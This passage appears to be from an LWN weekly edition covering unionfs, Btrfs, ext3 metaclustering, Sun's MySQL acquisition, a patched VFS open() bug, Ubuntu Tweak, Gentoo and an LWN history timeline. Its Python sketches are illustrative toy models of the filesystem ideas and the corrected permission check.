– be the next tool to be added?  

		State of the unionfs


LWN last looked at the unionfs
filesystem almost exactly one year ago.  Things have been relatively
quiet on the unionfs front during much of that time, but unionfs has not
gone away.  Now the unionfs developers are back with an improved version
and a determined push to get the code into 2.6.25.  So another look seems
indicated.

The core idea behind unionfs is to allow multiple, independent filesystems
to be merged into a single, coherent whole.  As an example, consider a user
with a distribution install DVD full of packages, a small disk, and
painfully slow bandwidth.  It would be nice to keep the DVD-stored packages
around for future installation.  What is also nice, though, is to be able
to keep a directory full of updates from the distributor and use those,
when they exist, in favor of the read-only DVD version.  Using unionfs,
this user could mount the DVD read-only, then mount a writable filesystem
(for the updates) on top of the DVD.  Updated packages go into the writable
filesystem, but all of the available packages are visible, together, in the
unified view.  To avoid confusion, the user could delete obsoleted
packages, at which point they would no longer be visible in the unionfs
filesystem, even though they cannot actually be deleted from the underlying
DVD.  Thus unionfs allows the creation of an apparently writable filesystem
on a read-only base; many other applications are possible as well.


If a user rewrites a file which is stored on a read-only "branch" of a
union filesystem, the response is relatively straightforward: the
newly-written file is stored on a higher-priority, writable branch.  If no
such branch exists, the operation fails.  Dealing with the deletion of a
file from a read-only branch is trickier, though.  In this case, unionfs
will create a "whiteout" in the form of a special file (starting with
.wh.) on a writable branch.  Some reviewers have disliked this
approach since it will clutter the upper branch with those special files
over time.  But it is hard to come up with another way to handle deletion,
especially if (as is the case here) your goal is to keep core VFS changes
to an absolute minimum.
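
The copy-up and whiteout behavior can be illustrated with a toy model.
This Python sketch is not how unionfs is implemented; it treats each branch
as a dictionary and assumes a single writable branch sitting above any
number of read-only ones.  The Union class and its method names are
hypothetical; only the .wh. prefix comes from the description above.

```python
WHITEOUT_PREFIX = ".wh."


class Union:
    """Toy union: one optional writable branch over read-only branches."""

    def __init__(self, upper, lowers):
        self.upper = upper      # dict name -> data, or None if nothing is writable
        self.lowers = lowers    # read-only dicts, highest priority first

    def lookup(self, name):
        if self.upper is not None:
            if WHITEOUT_PREFIX + name in self.upper:
                return None                 # masked by a whiteout
            if name in self.upper:
                return self.upper[name]
        for branch in self.lowers:
            if name in branch:
                return branch[name]
        return None

    def _require_writable(self):
        if self.upper is None:
            raise PermissionError("no writable branch in this union")

    def write(self, name, data):
        self._require_writable()
        self.upper.pop(WHITEOUT_PREFIX + name, None)   # writing undoes a deletion
        self.upper[name] = data                        # lower copies stay untouched

    def delete(self, name):
        self._require_writable()
        if self.lookup(name) is None:
            raise FileNotFoundError(name)
        self.upper.pop(name, None)
        if any(name in branch for branch in self.lowers):
            self.upper[WHITEOUT_PREFIX + name] = ""    # the whiteout file
```

In the DVD example, deleting a package through the union leaves the file in
place on the read-only branch and adds a .wh. entry to the writable one,
which is exactly the clutter that some reviewers object to.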


That hasn't kept the unionfs developers from trying, though.  Off to the
side, they have a version of unionfs which maintains a small,
special-purpose partition of its own (on writable storage).  Metadata
(whiteouts, in particular) is stored to this special unionfs partition and no
longer clutters the component filesystems.  There are other advantages to
the dedicated partition scheme, including the ability to include one
unionfs as a branch in a second union; see the unionfs ODF
document for more information on this approach, which the developers
hope to slowly migrate into the version they are currently proposing for
the mainline.


Another persistent problem with unionfs has been coping with modifications
made directly to the component branches without going through the union.  The
January, 2007 version of the patch came packaged with some dire warnings:
direct modification of unionfs branches could lead to system crashes and
data loss.  Given that filesystems which have been bundled into a union
still exist independently, they will always present a tempting target for
modification, even when there is not a specific reason (wanting to put
files onto a specific component filesystem, for example).  So a unionfs
implementation which cannot handle such modifications sets a trap for every
user who uses it.


The developers claim to have solved this problem in the current version of the
patch.  Now, almost every entry into the unionfs code causes it to check the
modification times for the relevant file in all layers of the union.  If
the file turns out to have been changed, unionfs will forget about the file
and reload the information from scratch, causing the most current version
of the file (or directory) to be visible to the user.  This approach solves
the problem in a relatively efficient manner, with one exception: unionfs
cannot tell when a process modifies a file which it has mapped into its
address space with mmap().  So, in that case, changes may not be
visible to processes accessing the affected file through the unionfs.
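
The revalidation idea can be sketched as follows.  This is a simplified
model under stated assumptions, not the unionfs code: each branch is a
dictionary mapping a name to a (modification time, data) pair, and the
CachingUnion class, its cache layout, and the reloads counter are all
invented for illustration.

```python
class CachingUnion:
    """Toy union that revalidates cached entries against branch mtimes."""

    def __init__(self, branches):
        self.branches = branches   # list of dicts: name -> (mtime, data)
        self.cache = {}            # name -> (mtimes seen at load time, data)
        self.reloads = 0           # how often the data was loaded from scratch

    def _mtimes(self, name):
        # One entry per layer; None where the layer lacks the file.
        return tuple(b[name][0] if name in b else None for b in self.branches)

    def _load(self, name):
        self.reloads += 1
        for branch in self.branches:       # highest priority first
            if name in branch:
                return branch[name][1]
        return None

    def read(self, name):
        current = self._mtimes(name)
        cached = self.cache.get(name)
        if cached is None or cached[0] != current:
            # Something changed underneath: forget and reload.
            self.cache[name] = (current, self._load(name))
        return self.cache[name][1]
```

Repeated reads of an unchanged file hit the cache, while a direct change to
any layer that updates the recorded time forces a reload on the next
access.  The model also makes the limitation visible: a change that does
not bump the recorded time is never noticed.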


In both cases, the unionfs developers would really prefer to have better
support from the VFS.  Some operating systems have provided native support
for whiteouts, but Linux lacks that support.  There is also no way for a
filesystem at the bottom of a stack of filesystems to notify the higher
layers that something has been changed.  Fixing either of these would
require significant VFS modifications, though, and the changes might
propagate down into the individual filesystem implementations as well.  So
nobody is expecting them to happen anytime soon.


Another significant change in unionfs is the elimination of the
ioctl() interface for the management of branches.  All changes to
an existing unionfs are now done using the remount option of the
mount command.  This change eliminates the need for a separate
utility for unionfs configuration and makes it possible to do complicated
changes in an atomic manner.


The end result of all this is that the unionfs hackers think that the time
has come to put the code into the mainline.  There, it would become the
second supported stacking filesystem (the first being eCryptfs), and would
help toward the long-term goal of making the VFS layer work better with
stacking.  Some people speak as if the merging of unionfs into 2.6.25 is a
done deal, but that is not yet guaranteed.  Christoph Hellwig, whose
opinion on such things carries a heavy weight, is opposed to the unionfs idea:


	 I think we made it pretty clear that unionfs is not the way to go,
	 and that we'll get the union mount patches clear once the
	 per-mountpoint r/o and unprivileged mount patches series are in
	 and stable.


Unionfs hacker Erez Zadok responds that
unionfs is working - and used - now, while getting union support into the
VFS is a distant prospect.  So he recommends:


	I think a better approach would be to start with Unionfs (a
	standalone file system that doesn't touch the rest of the kernel).
	And as Linux gradually starts supporting more and more features
	that help unioning/stacking in general, to change Unionfs to use
	those features (e.g., native whiteout support).  Eventually there
	could be basic unioning support at the VFS level, and concurrently
	a file-system which offers the extra features (e.g., persistency).


When one looks at a recent posting of the union mount patch, it's hard
to see it as a near-term solution.  As described by its author (Bharata
Rao), this work is in an early, exploratory state; there are a number of
problems for which solutions are not really in sight.  The union mount
approach, which does the hard work in the VFS layer, may well be the right
long-term approach, but it will not be in a state where it can be shipped
to users anytime soon.  


In the end, the problem is a hard one, and unionfs has a considerable lead
toward being a real solution.  That, alone, is not enough to guarantee that
unionfs will make it into the 2.6.25 kernel, but it does help that cause
considerably.  Anybody opposing the merger of unionfs will have to explain
why the union filesystem capability should not be available to Linux users
in 2008.

		A better btrfs


Chris Mason has recently released Btrfs v0.10, which contains a
number of interesting new features.  In general, Btrfs has come a long way
since LWN first wrote about
it last June.  Btrfs may, in some years, be the filesystem most of us
are using - at least, for those of us who will still be using rotating
storage then.  So it bears watching.


Btrfs, remember, is an entirely new filesystem being developed by Chris
Mason.  It is a copy-on-write system which is capable of quickly creating
snapshots of the state of the filesystem at any time.  The snapshotting is
so fast, in fact, that it is used as the Btrfs transactional mechanism,
eliminating the need for a separate journal.  It supports subvolumes -
essentially the existence of multiple, independent filesystems on the same
device.  Btrfs is designed for speed, and also provides checksumming for
all stored data.


Some kernel patches show up and quickly find their way into production
use.  For example, one year ago, nobody (outside of the -ck list, perhaps) was talking
about fair scheduling; but, as of this writing, the CFS scheduler has been
shipping for a few months.  KVM also went from initial posting to merged
over the course of about two kernel release cycles.
Filesystems do not work that way, though.
Filesystem developers tend to be a cautious, conservative bunch; those who
aren't that way tend not to survive their first few encounters with users
who have lost data.  This is all a way of saying that, even though Btrfs is
advancing quickly, one should not plan on using it in any sort of
production role for a while yet.  As if to drive that point home, Btrfs
still crashes the system when the filesystem runs out of space.  The v0.10
patch, like its predecessors, also changes the on-disk format.


The on-disk format change is one of the key features in this version of the
Btrfs patch.  The format now includes back references on almost all objects
in the filesystem.  As a result, it is now easy to answer questions like
"to which file does this block belong?"  Back references have a few uses,
not the least of which is the addition of some redundant information which
can be used to check the integrity of the filesystem.  If a file claims to
own a set of blocks which, in turn, claim to belong to a different file,
then something is clearly wrong.  Back references can also be used to
quickly determine which files are affected when disk blocks turn bad.
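
Both uses of back references can be shown with a small sketch.  The real
Btrfs on-disk format is far more involved; here the forward references are
simply a dictionary from file name to a set of block numbers, and the back
references a dictionary from block number to owning file.  Both structures
and both function names are assumptions made for the example.

```python
def check_back_references(file_blocks, block_owner):
    """Return (file, block, claimed_owner) for every mismatch found.

    file_blocks: file name -> set of block numbers the file claims
    block_owner: block number -> file name recorded in the back reference
    """
    problems = []
    for name, blocks in sorted(file_blocks.items()):
        for block in sorted(blocks):
            owner = block_owner.get(block)
            if owner != name:       # the block disagrees about its owner
                problems.append((name, block, owner))
    return problems


def files_hit_by_bad_blocks(bad_blocks, block_owner):
    """Map bad block numbers straight to the files that own them."""
    return {block_owner[b] for b in bad_blocks if b in block_owner}
```

Without the second dictionary, answering "which file owns block 3?" would
mean scanning every file's block list; with it, the answer is a single
lookup.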


Most users, however, will be more interested in another new feature which
has been enabled by the existence of back references: online resizing.  It
is now possible to change the size of a Btrfs filesystem while it is
mounted and busy - this includes shrinking the filesystem.  If the Btrfs
code has to give up some space, it can now quickly find the affected files
and move the necessary blocks out of the way.  So Btrfs should work nicely
with the device mapper code, growing or shrinking filesystems as conditions
require.


Another interesting feature in v0.10 is the associated in-place ext3
converter.  It is now possible to non-destructively convert an existing
ext3 filesystem to Btrfs - and to go back if need be.  The converter works
by stashing a copy of the ext3 metadata found at the beginning of the disk, then
creating a parallel directory tree in the free space on the filesystem.  So
the entire ext3 filesystem remains on the disk, taking up some space but
preserving a fallback should Btrfs not work out.  The actual file data is
shared between the two filesystems; since Btrfs does copy-on-write, the
original ext3 filesystem remains even after the Btrfs filesystem has been
changed.  Switching to Btrfs forevermore is a simple matter of deleting the
ext3 subvolume, recovering the extra disk space in the process.


Finally, the copy-on-write mechanism can be turned off now with a mount option.  For
certain types of workloads, copy-on-write just slows things down without
providing any real advantages.  Since (1) one of those workloads is
relational database management, and (2) Chris works for Oracle, the
only surprise here is that this option took as long as it did to arrive.
If multiple snapshots reference a given file, though, copy-on-write is
still performed; otherwise it would not be possible to keep the snapshots
independent of each other.
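
The interaction between the no-copy-on-write option and snapshots can be
modeled with reference counts.  This sketch is only an illustration of the
rule stated above; the Volume class, its nocow parameter, and the per-block
reference counting are hypothetical and say nothing about how Btrfs
actually tracks sharing.

```python
class Volume:
    """Toy volume whose blocks carry a count of referencing snapshots."""

    def __init__(self, nocow=False):
        self.nocow = nocow       # models the mount option
        self.blocks = {}         # block number -> data
        self.refs = {}           # block number -> number of references
        self.next_block = 0

    def _new_block(self, data):
        number = self.next_block
        self.next_block += 1
        self.blocks[number] = data
        self.refs[number] = 1
        return number

    def create(self, data):
        return self._new_block(data)

    def snapshot(self, block):
        self.refs[block] += 1    # the snapshot shares the same block
        return block

    def write(self, block, data):
        """Write new data; return the block number that now holds it."""
        if self.nocow and self.refs[block] == 1:
            self.blocks[block] = data        # safe to overwrite in place
            return block
        # Shared (or COW enabled): leave the old block for other holders.
        self.refs[block] -= 1
        if self.refs[block] == 0:
            del self.blocks[block], self.refs[block]
        return self._new_block(data)
```

With nocow set, a write to an unshared block lands in place; once a
snapshot shares that block, the next write goes to a fresh block and the
snapshot keeps the old contents.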


For those who are curious about where Btrfs will go from here, Chris has
posted a
timeline describing what he plans to accomplish over the coming year.
Next on the list would appear to be "storage pools," allowing a Btrfs
filesystem to span multiple devices.  Once that's in place, striping and
mirroring will be implemented within the filesystem.  Longer-term projects
include per-directory snapshots, fine-grained locking (the filesystem
currently uses a single, global lock), built-in incremental backup support,
and online filesystem checking.  Fixing that pesky out-of-space problem
isn't on the list, but one assumes Chris has it in the back of his mind
somewhere.


		ext3 metaclustering


The ext3 system uses the classic Unix block pointer method for keeping
track of the blocks in each file.  For a given file, the on-disk inode
structure contains space for twelve block numbers; they point to the first
twelve blocks in the file - the first 48KB of space.  If the file is larger
than that, a 13th pointer contains the address of the first indirect
block; this block contains another 1024 (on a 4K block filesystem)
block pointers.  Should that not suffice, there's a 14th pointer for the
double-indirect block - each entry in that block is the address of an
indirect block.  And if even that is not enough, there's a 15th entry
pointing to a triple-indirect block full of pointers to double-indirect
blocks. 
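
The arithmetic is easy to work through.  The following sketch counts the
indirect blocks (of all three levels) needed to map a file of a given
size.  It assumes four-byte block numbers, which is what yields 1024
pointers in a 4K block, and it ignores sparse files; the function names are
made up for the example.

```python
POINTER_SIZE = 4        # bytes per block number: 4096 / 4 = 1024 per block
DIRECT_POINTERS = 12    # block numbers stored in the inode itself


def ceil_div(a, b):
    return -(-a // b)


def indirect_blocks_needed(file_size, block_size=4096):
    """Count indirect, double-indirect, and triple-indirect blocks."""
    per_block = block_size // POINTER_SIZE
    remaining = ceil_div(file_size, block_size) - DIRECT_POINTERS
    if remaining <= 0:
        return 0                      # the inode's own pointers suffice

    total = 1                         # the single indirect block
    remaining -= per_block
    if remaining <= 0:
        return total

    covered = min(remaining, per_block ** 2)
    total += 1 + ceil_div(covered, per_block)    # double-indirect + children
    remaining -= covered
    if remaining <= 0:
        return total

    covered = min(remaining, per_block ** 3)
    total += (1                                   # the triple-indirect block
              + ceil_div(covered, per_block ** 2) # double-indirect blocks
              + ceil_div(covered, per_block))     # indirect blocks
    remaining -= covered
    if remaining > 0:
        raise ValueError("file too large for this block size")
    return total
```

A 48KB file needs no indirect blocks at all, while a 4GB file on a 4K-block
filesystem needs 1025 of them: one indirect block, one double-indirect
block, and 1023 more indirect blocks hanging off the latter.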


This is a very efficient representation for small files - the kinds of
files Unix systems typically held, once upon a time.  In current times, when one can forget
about that directory full of DVD images and never even notice the lost
space, it does not work quite as well - there is a lot of overhead for all
of those individual block pointers, and a large data structure to manage.
That is why removing a large file on an ext3 filesystem can take a long
time - the system has to chase down all of those indirect blocks, which, in
turn, forces a lot of disk activity and head seeks.  For this reason,
contemporary filesystems tend to use extent-based mechanisms to associate
blocks with files, but that is not really an option for ext3.


An additional problem with all those indirect blocks is that filesystem
checkers must locate and verify them all.  That, again, causes a lot of
head seeking and makes fsck run slowly.  Slow filesystem checking was the
motivation behind this patch from
Abhishek Rai which attempts to improve performance on filesystems with
a lot of indirect blocks.


The approach taken is relatively simple: the patch just tries to group 
indirect block allocations together on the disk.  The current ext3 code
will allocate indirect blocks when they are needed to account for data
blocks being added to the file; they are usually placed adjacent to those
data blocks.  One might think that this placement would speed subsequent
accesses to the file, but that is not necessarily so; the reading or
writing of the indirect block will tend to happen at a different time than
operations on the data blocks.  What this placement does accomplish,
though, is the distribution of the indirect blocks all over the disk.  So a
process which must examine all of the indirect blocks associated with a
file must cause the disk to do a lot of head seeks.


The "metaclustering" approach works by reserving a set of contiguous
blocks at the end of each block group.  Whenever an indirect block is
needed, the filesystem tries to get one from this dedicated area first.
The end result is that all of the indirect blocks are located next to each
other.  Should somebody need to read a number of those blocks without being
interested in the contents of the data blocks, they can grab them all
quickly with minimal seeking.  Filesystem checkers, as it happens, need to
do exactly that - as does the file removal process.  The patch did not come
with benchmarks, but the speedup that comes from the elimination of all
those seeks should be significant.
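
The allocation policy can be modeled in a few lines.  This is a toy block
group, not the ext3 allocator: the BlockGroup class and its methods are
hypothetical, and the sketch makes the simplifying assumption that data
blocks never spill into the reserved area.

```python
class BlockGroup:
    """Toy block group with a reserved indirect-block area at its end."""

    def __init__(self, size, reserved):
        self.size = size
        self.meta_start = size - reserved    # first block of the reserved area
        self.free = set(range(size))

    def _take(self, candidates):
        for block in candidates:
            if block in self.free:
                self.free.remove(block)
                return block
        return None

    def alloc_data(self):
        block = self._take(range(self.meta_start))
        if block is None:
            raise OSError("no free data blocks")
        return block

    def alloc_indirect(self):
        # Try the dedicated area first ...
        block = self._take(range(self.meta_start, self.size))
        if block is None:
            # ... and fall back to the general area only when it is full.
            block = self._take(range(self.meta_start))
        if block is None:
            raise OSError("block group full")
        return block
```

In a 16-block group with four reserved blocks, the first four indirect
blocks land at 12 through 15, next to each other, regardless of where the
data blocks went; only the fifth ends up among the data.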

Even so, Andrew Morton questioned the need
for this patch, worrying that its benefits do not justify the risks that
come with modifying an established, heavily-used filesystem:


	In any decent environment, people will fsck their ext3 filesystems
	during planned downtime, and the benefit of reducing that downtime
	from 6 hours/machine to 2 hours/machine is probably fairly small,
	given that there is no service interruption.


Others disagreed, though, noting that it's the unplanned filesystem
checks which are often the most time-critical.  That includes the
delightful "maximal mount count" boot-time check which, in your editor's
experience, always happens when one is trying to get set up to give a talk
somewhere.  So this patch might just find eventual acceptance - it should
be relatively low-risk and does not require any on-disk format changes.
This is a filesystem patch, though, so nobody will be in any hurry to get
it into the mainline before a lot of testing and review has been done.

		SAMP?


A few articles making predictions for 2008 had put an initial public
offering by MySQL on their list.  The company had clearly been heading in
that direction for a while; sales were growing, venture capital was coming
in, etc.  In the end, though, the MySQL IPO seems destined not to happen -
Sun Microsystems got
there first.
The deal is structured as a full acquisition - Sun will pay about
$800 million for all outstanding shares of MySQL stock.  In addition,
about $200 million in options will be covered, so, overall, this is a
billion-dollar deal.  Not bad for a company which is based on free
software. 


Sun is making the right noises about how this deal will work.  There is no
talk of taking MySQL proprietary or changing its license.  MySQL will
continue to be supported on all platforms, and not just Solaris.  A series
of grants will be made to help university researchers advance the state of
the art in database management systems.  There is a lot of talk about
continuing to support "the community," though details are (perhaps
necessarily) scarce.  CEO Jonathan Schwartz says
that Sun will be working to improve "the rest of the LAMP" stack, though he
says nothing about the "L" (for Linux) part.


Chances are that this deal will be a good thing for MySQL users.  Sun is
clearly making MySQL an important part of its overall strategy (in these
days, one does not toss $1 billion toward unimportant objectives) and
can be expected to continue - or accelerate - development of the system.
Sun's free software orientation is strong enough that the chances of parts
or all of MySQL going proprietary seem small.  Indeed, nothing in Sun's
releases says anything about MySQL's commercial licensing business; the
emphasis appears to be strongly on support and services.  So MySQL might
just become even more open than it is now.


Sun appears to be positioning itself to compete strongly with Oracle.  Both
companies are working hard to be able to offer the entire software stack to
their customers.  So Oracle's push into the Linux distribution business and
Sun's database venture are both aimed at having the same story for their
sales staff to tell: we, in some way, own and control all of the software
you are looking to run.  No problems with incompatibilities,
finger-pointing, etc.  As an added bonus, Sun will happily sell you the
hardware you need too.  Do expect an increase in efforts aimed at moving
MySQL users away from the (Oracle-owned) InnoDB engine, though.


For Sun to sell that story, though, it will have to continue to push
Solaris hard as an alternative to Linux.  Either that, or the company will
eventually find itself shopping for a Linux distributor of its own.  Either
way, it seems likely that competitive pressures in operating system (and
higher-layer) sales and support are set to increase, especially in the
high-performance web server area.  Red Hat, whose PostgreSQL-based database
offering appears to have fallen below the radar, may find itself scrambling
for a response.


Sun makes a big point of being able to sell the entire package, and there
is some truth to that.  Processors, storage, systems software, database
software, programming languages, office suites, and more can all be had
from one company.  What remains to be seen is whether this is really what
customers want.  There is a lot of value in being able to integrate
components from multiple sources and not being dependent on a single
vendor.  Your editor, who managed a transition from being an all-DEC shop
to an all-Sun shop some twenty years ago, is not convinced that those days
are worth going back to.

		A kernel security hole


Security holes can sneak into code in surprising ways, even in highly
scrutinized codebases.  Perhaps even more surprising is how long they can
persist in something as popular as the Linux kernel before someone
notices.  The release of stable
kernels 2.6.22.16 and 2.6.23.14 this week is instructive for both of
those reasons.


The bug that led to the releases is fixed by a two-line
patch, but might be exploitable to cause filesystem corruption.
If it were a bug in a driver for an obscure piece of hardware,
with relatively few users, it might have been less eye-opening, but it was
in the Virtual File System (VFS) layer of the kernel.  VFS is the
abstraction that allows all kernel filesystems to be used identically
regardless of their underlying implementation.  The open() system
call is used to open any file on any type of filesystem; VFS is what makes
that work.


In fact, it is the open() path that is affected by the bug.
Due to a faulty test, the bug allows directories to be opened for writing,
which is generally a recipe for disaster.  It could also allow a file on a
read-only filesystem to be opened for writing; depending on the underlying
filesystem implementation, that could lead to corruption.  Both problems are
only locally exploitable.
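
The check that the bug undermined is easy to observe from user space.  The
following minimal Python sketch, which assumes a Linux system with a
correctly functioning kernel, tries to open a freshly created temporary
directory for writing and reports the resulting error code.  The helper name
open_dir_for_write() is invented for illustration, and the sketch is not a
test for the vulnerability itself.

```python
import errno
import os
import tempfile


def open_dir_for_write(path):
    """Try to open a directory write-only; return the errno, or 0 on success."""
    try:
        fd = os.open(path, os.O_WRONLY)
    except OSError as err:
        return err.errno
    os.close(fd)
    return 0


# Use a scratch directory so that nothing of value is touched.
with tempfile.TemporaryDirectory() as scratch:
    result = open_dir_for_write(scratch)

# Print the symbolic error name if there is one, else the raw number.
print(errno.errorcode.get(result, result))
```

A kernel that performs the directory test properly is expected to refuse the
open with EISDIR.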


The bug was introduced in a change to support NFS in October of 2005 – more
than two years ago; all kernels since 2.6.15 are affected.  The change
was aimed at making NFSv4 open calls be atomic (because an open is really a
lookup followed by an open), but also did some code reorganization that
changed the semantics of a flag variable.  That variable was being used to
determine the access mode for directories and read-only filesystems, so
that change subtly broke the tests.


Part of the problem is that the tests are in a function called
may_open(), which takes two flag parameters, acc_mode and flag.

The incorrect code was using flag in the tests when it should have
been using acc_mode.  Each of them is a bitmask of values that, at
first glance, might be easy to confuse – each is related to permissions.
The bit values for each have names like FMODE_WRITE and
MAY_WRITE, which would seem to have a fair amount of overlap. This
may explain why the problem was not spotted at the time it was introduced.
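
To see how easily the two masks can be mixed up, consider the following toy
model in Python.  It is not kernel code: the bit values, the
may_open_buggy() and may_open_fixed() helpers, and the assumption that the
caller adds write access to acc_mode for a truncating open are all made up
for illustration.

```python
import errno

# Illustrative bit values only; they are assumptions, not copied from the kernel.
FMODE_READ, FMODE_WRITE = 1, 2           # bits tested in "flag"
MAY_EXEC, MAY_WRITE, MAY_READ = 1, 2, 4  # bits tested in "acc_mode"


def may_open_buggy(is_dir, acc_mode, flag):
    """Model of the faulty test: consults flag to decide about write access."""
    if is_dir and (flag & FMODE_WRITE):
        return -errno.EISDIR
    return 0


def may_open_fixed(is_dir, acc_mode, flag):
    """Model of the corrected test: consults acc_mode instead."""
    if is_dir and (acc_mode & MAY_WRITE):
        return -errno.EISDIR
    return 0


# Hypothetical caller: the open is read-only as far as flag is concerned,
# but acc_mode also asks for write access (say, because of a truncation).
flag = FMODE_READ
acc_mode = MAY_READ | MAY_WRITE

buggy_result = may_open_buggy(True, acc_mode, flag)
fixed_result = may_open_fixed(True, acc_mode, flag)
print(buggy_result, fixed_result)
```

Both tests look plausible in isolation, and each uses bit names that belong
to the variable being tested, which is what makes this sort of mistake hard
to spot in review.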


There may be no easy solution to this kind of problem – other than
more scrutiny.  Using different types, rather than plain int, for
each flag might have helped, but since the tests were using the right kind
of bit values for flag, that is a somewhat hard sell. 


Something unpleasant to consider in all of this is that this may not be the
first time this problem has been noticed.  It may just have been the first time
it was noticed by someone who reported it.  Folks with malicious intent
are much less inclined to report bugs.  This particular bug is not one that
would be particularly useful to attackers, but we would do well to remember
that fixing a two-year-old hole means that systems were vulnerable for all
that time.  It is not only the good guys who can read code.


		Use Ubuntu Tweak to adjust hidden GNOME options


Ubuntu Tweak
is a GNOME desktop configuration tool that works with
versions 7.04 and 7.10 of the Ubuntu distribution.
From the application's splash screen:


This is a tool for Ubuntu which makes it easy to change hidden system and
desktop settings.  Ubuntu Tweak is currently only for the GNOME Desktop
Environment.


Version 0.2.4 of Ubuntu Tweak was announced in December 2007:
"With many bugs fixed and two language added, the stable version of Ubuntu Tweak 0.2.4 released!"


Installation was trivial: the .deb file was downloaded
in the Firefox web browser, which, in turn, allowed the installer application
to be run.  A minute later, the software was ready to go.
The application was automatically added to the GNOME
Applications/System Tools pulldown menu.


So, what can Ubuntu Tweak do?
There are a number of top-level icons, some with multiple sub-icons.
Top-level categories include: Computer, Startup, Desktop, System and
Security.  Clicking on the Computer icon reveals useful information
such as the hostname, distribution version, kernel rev, platform, CPU
type and speed and memory capacity.  The username, home directory, shell and
default language are also displayed.
The Startup icon allows the user to toggle features such as the
automatic saving of session changes, the logout prompt, remote
TCP connections and the splash screen.


The Desktop icon allows numerous features to be adjusted on the
Desktop Icon Settings, the Metacity window manager, Compiz Fusion,
the GNOME panel and menu and the Nautilus file browser.
The System icon has toggles and sliders for controlling various
power management parameters.  Lastly, the Security option has
toggles for disabling the Run Application dialog, the Lock Screen,
Printing, Printer Setup, Save to Disk and User Switching.


That's about all there is to this version of Ubuntu Tweak;
there is room to add many more control options.
Ubuntu Tweak seems like a useful tool for managing options that don't
really fit anywhere else on the desktop environment.
The only surprise is that this is, by name, only useful for
the Ubuntu distribution.  It seems as though making a multi-distribution
GNOME-tweak would not require many changes to the code.


		Is Gentoo in crisis?


  It all started with a blog post
  by Daniel Robbins. That was on January 11. But of course, it didn't really
  start there. That's just when the internal furor over the revocation of the
  Gentoo Foundation's corporate license became public. Developers had been
  trying to figure out what to do in the internal gentoo-core mailing list
  for about a week, and as such things do, it leaked.


  The larger-scale problems didn't even start there. The Gentoo Weekly
  Newsletter hasn't been posted for 13 weeks, and the Gentoo homepage hadn't
  seen any changes in the same amount of time. Furthermore, Gentoo's second
  release of 2007, dubbed 2007.1, never happened, and on Monday its
  cancellation was announced.


  What do these problems mean? Is Gentoo collapsing? Another blog
  post by Daniel Robbins suggests part of the answer—serious
  communication problems exist between developers and the rest of the Gentoo
  community. The relevant aspect here is that developers are so focused on
  working in their little areas that they fail to tell the world what they're
  doing. Everyone wants to develop, and nobody wants to spend time telling the
  world what's being developed. Most developers don't want to spend time doing
  anything but develop. In the same way, developers don't enjoy spending time
  dealing with "boring" issues like donations, copyright, tax returns, etc.,
  nor are they generally any good at it.


  Development remains active in the background—new versions of packages
  appear, bugs are fixed, the gentoo-dev mailing list is quite active, and so
  is IRC. Developers continue to blog on Planet Gentoo. But none of that is
  apparent to Gentoo users, who go to the homepage, read the weekly
  newsletter, and wait for the next release. To users, things can look like
  they're in stasis.


  That's where Gentoo needs to concentrate its efforts: telling the world what
  developers are doing. To accomplish that, the project will either need to
  find new contributors interested in doing this or streamline its processes
  so that less effort is required to communicate (for example, automatically
  including Planet information or new versions from packages.gentoo.org on the
  homepage). For the foundation specifically, one hope is to hand off the
  work to people who enjoy dealing with it, such as those at Software in the
  Public Interest or the Software Freedom Conservancy, so that developers can
  concentrate on development. An announcement on the Gentoo homepage proposing
  a move
  to a monthly newsletter brought nearly 20 offers of help in only 2 days, so
  it may be that the project hasn't been looking for non-development help in
  all the right places.


  Gentoo isn't dying, but its developers need to tell that to the world.


		Ten-year timeline part 3: The Tucows years


This is the third installment in a ten-year retrospective inspired by LWN's
tenth anniversary; those who have not yet seen them may want to have a look
at Part 1 and Part 2.  At the end of the
second part, LWN had just emerged from the peak of the dotcom bubble having
made a deal with Tucows.  For almost two years we operated as a part of
that company; here are some highlights from that time.


 April 13, 2000: Linuxcare 
     postpones its IPO indefinitely and rearranges its management.  Minix
     is released as free software.

 April 20, 2000: Linux
     Business Expo in Chicago.  Microsoft's FrontPage back door is exposed.
     Devfs flame wars continue.  Red Hat fired by its ad agency.  Shares of
     Caldera, VA Linux Systems and Andover.Net all fall below their IPO
     prices. 

 April 27, 2000: Oracle
     creates Miracle Linux in Japan.  Red Hat launches its embedded
     developer's kit.

 May 4, 2000: Linuxcare
     lays off 35% of its staff and officially cancels its IPO.


Needless to say, by this time we were happy to have found a relatively
stable place to be - times were starting to look a little tough.  Between
the end of the Linuxcare IPO - once supposed to be the biggest and best of
them all - and the fact that other Linux companies had fallen below their
initial prices, it seemed that the honeymoon was pretty well over.  By this
time, LWN's revenue stream from advertising had pretty well dried up too.


Red Hat's embedded business is a classic case of a lost opportunity.  The
acquisition of Cygnus should have placed Red Hat in a strong position in
this sector, but, somehow, it all slipped away.


 May 11, 2000: Red Hat
     changes direction, dumps its news site, and jumps into the venture
     capital business.  The first public BitKeeper release happens.  The
     Free Standards Group is formed.

 May 18, 2000: Rumors of
     Wine 1.0.  IBM releases the S/390 port.  Memory management problems
     plague the pre-2.4 development kernels.


One might think it cynical and mean-spirited to point out that we're still
waiting for Wine 1.0.  But we'll do it anyway.  The memory management
issues with 2.4 were to be with us for some time, as it turned out.


 May 25, 2000: The Linux
     Mall and EBIZ merge.  Lineo files for an IPO.  Eric Raymond decides to
     rewrite the kernel configuration system.

 June 8, 2000: A fight over
     whether Reiserfs should go into the 2.4 kernel.

 June 22, 2000: British
     Telecom claims to own a patent on linking and starts suing ISPs for
     being part of the world wide web.  2.4.0 test kernels come out in two
     flavors with different memory managers.  More Reiserfs flames.


Given that the 2.4.0 release was far overdue, one would think that
arguments over whether a completely new filesystem should be added would be
considered out of place.  But they did happen, with Hans Reiser showing a
level of anger and paranoia that put much of the community off of dealing with
him for years.  It is rare that kernel developers are accused of putting
corporate interests above those of the kernel as a whole, but that happened
here. 

It is actually worth reflecting on this a bit: kernel developers work for
roughly 200 companies, many of which are direct competitors.  But that
competition has remained almost entirely absent from the development
process.  We are very good at developing common resources in a highly
collaborative way while competing at different levels.


 June 29, 2000: MySQL
     switches to the GPL, moves to SourceForge.  2.4.0-test2
     is officially blessed with penguin pee.

 July 20, 2000: Miguel de
     Icaza proclaims that "Unix sucks" at OLS.  Sun releases StarOffice
     under the GPL.  Rumors circulate that Caldera might acquire SCO; if
     only we'd known where that would go.
     Larry Wall announces that Perl 6 will be a complete rewrite of
     the language.  If only we'd known where that would go - or not go.  A
     set of locking changes goes into the 2.4.0-test kernel - which is
     allegedly stabilizing for release.

